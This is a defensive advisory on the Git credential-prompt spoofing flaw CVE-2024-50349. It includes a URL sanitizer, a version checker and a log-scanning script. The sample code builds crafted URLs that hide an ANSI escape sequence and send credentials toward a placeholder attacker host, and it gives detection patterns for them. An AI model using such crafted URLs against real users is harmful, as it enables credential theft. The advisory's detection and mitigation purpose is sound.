CVE-2024-50349

4.7 MEDIUM

📋 TL;DR

When Git needs a username or password and no credential helper can supply one, it asks on the terminal and prints the host it is asking for. That host text is taken straight from the URL without sanitizing it, so a URL that embeds ANSI escape sequences can make the terminal redraw the prompt to show a legitimate-looking host (for example github.com) while the credentials actually go to the attacker's host named in the URL. Anyone whose Git falls back to the interactive terminal prompt is affected; this includes users who have a credential helper configured but have not yet stored a credential for the host in question.
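The underlying problem is raw control bytes reaching the terminal. The following is an added example, not Git's own code and not part of the advisory: a POSIX shell function that percent-encodes everything outside printable ASCII (plus '%' itself, so the output stays unambiguous) before a URL is shown to a human. The sample URL is constructed here to show the effect; evil.example is a placeholder host.

```sh
# Added example, not Git's own code: make a URL safe to print in a prompt by
# percent-encoding every byte a terminal could act on instead of display.

# sanitize_for_prompt STRING
#   Prints STRING with C0 control bytes (0x00-0x1F), DEL (0x7F), any byte
#   outside printable ASCII and the '%' character itself percent-encoded.
#   Encoding '%' too means a literal "%1B" in the input comes out as "%251B",
#   so the reader can never confuse encoded and un-encoded text.
sanitize_for_prompt() {
  printf '%s' "$1" |
    od -An -v -tu1 |          # one decimal byte value per token
    tr -s ' ' '\n' |          # one value per line (blank lines are skipped)
    LC_ALL=C awk '
      NF == 0 { next }
      {
        b = $1 + 0
        if (b < 32 || b > 126 || b == 37)
          printf "%%%02X", b  # e.g. ESC -> %1B, CR -> %0D, "%" -> %25
        else
          printf "%c", b
      }
      END { printf "\n" }'
}

# Constructed sample: an ESC-led "erase line" sequence and a carriage return
# hidden inside a URL. Printed raw, the terminal would act on both.
SAMPLE_URL=$(printf 'https://\033[2K\rgithub.com@evil.example/repo.git')

# Run as `sh thisfile.sh --demo` to see the raw and the sanitized form.
if [ "${1:-}" = "--demo" ]; then
  printf 'raw bytes:  '; printf '%s' "$SAMPLE_URL" | od -An -c | tr -s ' '
  printf 'sanitized:  %s\n' "$(sanitize_for_prompt "$SAMPLE_URL")"
fi
```

The sanitized form of the sample is https://%1B[2K%0Dgithub.com@evil.example/repo.git: the real host is now visible and the escape sequence is inert text.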

💻 Affected Systems

Products:
  • Git
Versions: Every release before the fixed release of its own maintenance line, i.e. 2.48.0, 2.47.0-2.47.1, 2.46.0-2.46.2, 2.45.0-2.45.2, 2.44.0-2.44.2, 2.43.0-2.43.5, 2.42.0-2.42.3, 2.41.0-2.41.2, 2.40.0-2.40.3, and all of 2.39 and earlier (no fix was issued for lines older than 2.40)
Operating Systems: All operating systems where Git is installed
Default Config Vulnerable: ⚠️ Yes
Notes: Only the interactive terminal prompt is affected. A credential helper removes the prompt only for hosts it already holds a credential for; the first-time prompt for a new host still goes through the terminal. GUI clients and GUI askpass programs render the host as plain text and are not affected by terminal escape sequences.

📦 What is this software?

Git is the distributed version control system used by most software projects. The flaw is in the command-line client's interactive credential prompt, not in any hosting server: no GitHub, GitLab or self-hosted server change fixes it, only the client upgrade does.

⚠️ Risk & Real-World Impact

🔴

Worst Case

A developer types a password or personal access token for what the prompt shows as GitHub or GitLab; the credentials are sent over HTTPS to the attacker's host, the real host in the URL, and are then usable against the genuine service with whatever permissions that token carries.

🟠

Likely Case

A developer clones an untrusted repository, or a repository whose submodule URLs point at an attacker's host, is prompted for credentials under a misleading host name, and hands them to the attacker.

🟢

If Mitigated

With a patched client, or with a credential helper that already holds the relevant credentials and a habit of not cloning unknown URLs, the misleading prompt is either never shown or shows the host in escaped form, and the attack has nothing to work with.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: LOW

🎯 Exploit Status

Public PoC: ❌ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Crafting the URL is trivial; the only barrier is getting a victim to clone it, either directly or through a submodule URL in a repository they trust. No access to the victim's machine or to any Git server is needed.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: v2.48.1, v2.47.2, v2.46.3, v2.45.3, v2.44.3, v2.43.6, v2.42.4, v2.41.3, v2.40.4

Vendor Advisory: https://github.com/git/git/security/advisories/GHSA-hmg8-h7qf-7cxr

Restart Required: No

Instructions:

1. Check the current Git version with 'git --version'.
2. If the version is below the fixed release for its maintenance line, upgrade using your package manager (apt, yum, brew) or download from git-scm.com.
3. Verify the upgrade with 'git --version'.

🔧 Temporary Workarounds

Use credential helper

Platform: all

Configure a credential helper so Git can obtain credentials without the terminal prompt. Two caveats: a helper only avoids the prompt for hosts it already holds a credential for, so the first-time prompt for a new host is still exposed and this is not a complete workaround; and the 'store' helper writes credentials in plaintext to ~/.git-credentials. Where available, prefer an OS keychain helper (osxkeychain, Git Credential Manager, libsecret) or the in-memory 'cache' helper.

git config --global credential.helper store

Avoid untrusted URLs

Platform: all

Only clone repositories from sources you trust, and avoid '--recurse-submodules' on unknown repositories: submodule URLs come from the repository's own .gitmodules file, so a clone of a benign-looking repository can trigger a credential prompt for a URL you never typed.

🧯 If You Can't Patch

  • Avoid cloning repositories from untrusted or unknown sources, and in particular do not use '--recurse-submodules' on them, since submodule URLs are chosen by whoever controls the repository.
  • Use a GUI client or a GUI askpass program, or configure a credential helper; keep in mind that a helper only removes the prompt once it holds a credential for that host.
  • Treat any credential prompt for a host you did not expect to authenticate to as suspicious and abort it (Ctrl-C) rather than typing credentials.

🔍 How to Verify

Check if Vulnerable:

Run 'git --version' and compare against the fixed release of the same maintenance line, not against v2.48.1 alone: 2.47.2 is older than 2.48.1 but is patched, while 2.48.0 is newer than 2.47.2 but is not. You are vulnerable if you run 2.48.0, or a 2.47 release below 2.47.2, a 2.46 release below 2.46.3, 2.45 below 2.45.3, 2.44 below 2.44.3, 2.43 below 2.43.6, 2.42 below 2.42.4, 2.41 below 2.41.3, 2.40 below 2.40.4, or anything older than 2.40.

Check Version:

git --version
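The upgrade instructions in the Fix section and the check above both come down to the same per-line comparison, which is easy to get wrong by hand. The following is an added example, not part of the advisory or of Git itself: a POSIX shell script that normalizes the output of 'git --version' (including platform suffixes such as '.windows.1') and compares it against the fixed release of its own maintenance line. The assumption that 2.49 and later carry the fix follows from those releases being cut after it.

```sh
#!/bin/sh
# Added example, not part of the advisory or of Git: is this `git --version`
# string at or past the fixed release of its own maintenance line?

# Fixed releases per maintenance line, as listed in the advisory.
PATCHED_RELEASES="2.48.1 2.47.2 2.46.3 2.45.3 2.44.3 2.43.6 2.42.4 2.41.3 2.40.4"

# normalize_version "git version 2.47.1.windows.1"  ->  "2.47.1"
#   Prints nothing when no major.minor[.patch] number is found.
normalize_version() {
  printf '%s\n' "$1" |
    sed -n 's/^\(git version \)\{0,1\}\([0-9][0-9]*\.[0-9][0-9]*\(\.[0-9][0-9]*\)\{0,1\}\).*/\2/p'
}

# git_is_patched VERSION
#   Returns 0 if VERSION carries the fix, 1 if it does not, 2 if unparsable.
git_is_patched() {
  ver=$(normalize_version "$1")
  if [ -z "$ver" ]; then
    return 2
  fi
  major=${ver%%.*}
  rest=${ver#*.}
  minor=${rest%%.*}
  case "$rest" in
    *.*) patch=${rest#*.} ;;
    *)   patch=0 ;;                 # "2.48" means 2.48.0
  esac

  if [ "$major" -ne 2 ]; then
    # A hypothetical 3.x is newer than every fix; 1.x never received one.
    if [ "$major" -gt 2 ]; then return 0; else return 1; fi
  fi

  # Same minor line as a fixed release: only the patch level matters.
  for fixed in $PATCHED_RELEASES; do
    frest=${fixed#*.}
    fminor=${frest%%.*}
    fpatch=${frest#*.}
    if [ "$minor" -eq "$fminor" ]; then
      if [ "$patch" -ge "$fpatch" ]; then return 0; else return 1; fi
    fi
  done

  # No fixed release in this line: 2.49 and later were cut after the fix,
  # 2.39 and earlier never received it.
  if [ "$minor" -gt 48 ]; then return 0; else return 1; fi
}

# Run as `sh thisfile.sh --check` to test the git on PATH.
if [ "${1:-}" = "--check" ]; then
  gv=$(git --version 2>/dev/null || true)
  if git_is_patched "$gv"; then
    echo "OK: '$gv' includes the fix for CVE-2024-50349"
  else
    echo "UPGRADE: '$gv' is not a fixed release (or could not be parsed)"
    exit 1
  fi
fi
```

The '--check' mode exits non-zero when the client is unpatched or unrecognized, so the script can be dropped into a CI job or a fleet inventory run as-is.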

Verify Fix Applied:

After upgrading, run 'git --version' and confirm it reports the fixed release for your maintenance line (or newer). To exercise the fix itself, trigger an interactive credential prompt for a URL you control that contains a control character: a patched client shows the host text with the control character in escaped form, while an unpatched client lets the terminal interpret it.

📡 Detection & Monitoring

Log Indicators:

  • Git itself does not write a log of clone or fetch operations; look instead at shell history, CI job logs and EDR process-creation events for git command lines whose URL contains a raw ESC byte (0x1B) or its percent-encoded form %1B
  • Authentication attempts, successful or failed, against hosts that are not your sanctioned Git hosts, shortly after a clone or fetch

Network Indicators:

  • HTTPS or SSH connections from developer workstations or CI runners to hosts that are not your sanctioned Git hosts, made by a git process
  • A credential sent over HTTPS (Basic auth) to a host other than the one the user believes they are authenticating to; TLS interception is needed to see the credential, but the destination host alone is already a useful signal

SIEM Query:

The field and source names below are placeholders for whatever log source captures git command lines (EDR process events, shell history collection, CI logs); Git produces no such log by itself. Match both the raw escape byte and its percent-encoded form, since either can appear depending on how the command was recorded.

source="git.log" AND ("clone" OR "fetch" OR "submodule") AND (url="*%1B*" OR url="*\x1b*")
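The same check as a runnable filter, for environments without a SIEM. This is an added example, not part of the advisory or of Git: a POSIX shell function wrapping awk that reads captured command lines (shell history, CI job logs, EDR process events) and reports git commands whose URL argument carries raw control bytes or their percent-encoded forms. Percent-encoded forms are included because URL components may be decoded before being shown. The sample log is constructed; evil.example is a placeholder host.

```sh
# Added example, not from the advisory or Git: scan captured command lines for
# git commands whose remote URL carries terminal control characters.
#
# flag_suspicious_git_urls [FILE...]
#   Reads FILE(s) or stdin. For each git command that takes a remote URL,
#   inspects every URL-shaped argument for raw C0/DEL control bytes or their
#   percent-encoded forms (%00-%1F, %7F) and prints "line N: <url>" with raw
#   control bytes replaced by '?' so the report is itself safe to view.
flag_suspicious_git_urls() {
  LC_ALL=C awk '
    # Only git subcommands that accept a remote URL.
    !/git[ \t]+(clone|fetch|pull|remote[ \t]+add|submodule)/ { next }
    {
      for (i = 1; i <= NF; i++) {
        tok = $i
        # URL-shaped arguments: scheme://... or scp-like user@host:path
        if (tok !~ /^[A-Za-z][A-Za-z0-9+.-]*:\/\// && tok !~ /^[^@]+@[^:]+:/)
          continue
        if (tok ~ /[[:cntrl:]]/ || tok ~ /%(0[0-9A-Fa-f]|1[0-9A-Fa-f]|7[Ff])/) {
          gsub(/[[:cntrl:]]/, "?", tok)   # neutralise before printing
          printf "line %d: %s\n", NR, tok
          break
        }
      }
    }' "$@"
}

# Constructed sample log of five command lines; lines 2 and 3 should be flagged.
SAMPLE_LOG=$(printf '%s\n' \
  'git clone https://github.com/git/git.git' \
  "$(printf 'git clone https://\033[2Kgithub.com@evil.example/repo.git')" \
  'git fetch https://user%1B@evil.example/r.git' \
  'ls -la' \
  'git clone git@github.com:git/git.git')

# Run as `sh thisfile.sh --demo` to scan the sample; otherwise pipe your own
# log into flag_suspicious_git_urls.
if [ "${1:-}" = "--demo" ]; then
  printf '%s\n' "$SAMPLE_LOG" | flag_suspicious_git_urls
fi
```

On the sample this prints 'line 2: https://?[2Kgithub.com@evil.example/repo.git' and 'line 3: https://user%1B@evil.example/r.git'; the ordinary GitHub clones on lines 1 and 5 are not reported.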

🔗 References

  • GitHub Security Advisory GHSA-hmg8-h7qf-7cxr: https://github.com/git/git/security/advisories/GHSA-hmg8-h7qf-7cxr
  • NVD record: https://nvd.nist.gov/vuln/detail/CVE-2024-50349
